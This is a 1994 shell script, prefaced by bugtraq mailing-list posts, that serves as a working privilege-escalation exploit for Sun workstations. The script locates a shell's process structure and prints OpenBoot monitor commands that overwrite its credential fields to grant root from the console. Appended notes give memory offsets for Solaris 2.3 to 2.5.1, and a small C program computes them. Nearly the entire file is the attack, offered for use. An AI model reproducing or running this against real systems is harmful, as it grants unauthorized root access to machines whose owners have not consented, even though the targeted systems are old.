#!/bin/sh -

# From: an100188@anon.penet.fi
# Subject: Breaking in from the monitor at the console
# Date: Fri, 27 May 1994 15:34:36 UTC
# To: bugtraq@crimelab.com
#
# Breaking into a machine, typically a workstation, by using the monitor
# at the console to poke values into memory has always been possible.  I
# didn't realize how simple and unobtrusive it was before I saw this
# script.  This one is for Suns, but the principle applies to any
# machine with a console monitor.  On Sun4s there is some sort of
# "secure mode" that I presume lets you disable the monitor.  It is
# possible to change the L1-A sequence to another pair of keys, but if
# you own /dev/console you can change it back.  This obscurity may or
# may not be useful.
#
# This particular attack needs a way to run the script on the machine,
# typically in a shell.  I presume there are other spots where you could
# tickle a machine that don't even require that.  Physically secure
# consoles prevent this attack.
#
# Sigh.
#
# ----------------------------------------------------------------------------
#
# Subject: Re: Breaking in from the monitor at the console
# Date: Sat, 28 May 1994 10:15:52 UTC
# To: bugtraq@crimelab.com
#
# Oops, someone pointed out that the script was deleted by the anonymous
# mail signature-remover.  Sorry about that.  Here's the script:
#
#
#
# Program: fc-4.1.3
# Author: Anonymous
# Usage: fc-4.1.3 PID
#       PID is the PID of the shell you wish to give root to.
#
# Description:
#       Tell people how to give themselves root (on SunOS 4.1.3 machines)
#

# Give the program a known path
PATH="/bin:/usr/etc:/usr/ucb"
export PATH

if [ $1x = x ]; then
cat - << EOF
Usage: $0 PID
        Where PID is the PID of the shell you want to give root to.

Note - for csh the PID is stored in \$\$.
EOF
        exit 1
fi

# This is the start of the proc structure for a given PID.
procp=`pstat -u $1 | grep procp | cut -f2`

# This is really the only important information here.
# This number is the offset of the pointer to the cred structure
# in the proc structure.
ucred="4c"

cat - << EOF
On the console press '<L1>a', you should see then see the following message:
        Type  'go' to resume
        ok

type the following at the 'ok' prompt:
        b 2 do 0 $procp $ucred + l@ i + w! 2 +loop
        go

Notes:
        * On some sun keyboards the '<L1>' key is labeled 'Stop'.
        * There is Emacs style line editing available at the 'ok' prompt.
EOF

exit 0

# For solaris 2.3/2.4:

	ps -lp $$
	get start of proc area
	+0x24 hex to get the cred pointer
	cred +0x4 for uid, +0xc for effective uid

# for 2.5 and 2.5.1:

	ps -lp $$
	 to get start of proc area
	   +0x18 hex to get the cred poiner
	     +0x4 for uid, +0xc for effective uid


solaris offsetfinder:

#include <sys/proc.h>
 
struct proc p;
struct cred c;
 
main() {
 
  printf("%lx\n",(int)&p.p_cred-(int)&p);
  printf("%lx %lx\n",(int)&c.cr_uid-(int)&c, (int)&c.cr_ruid-(int)&c);
}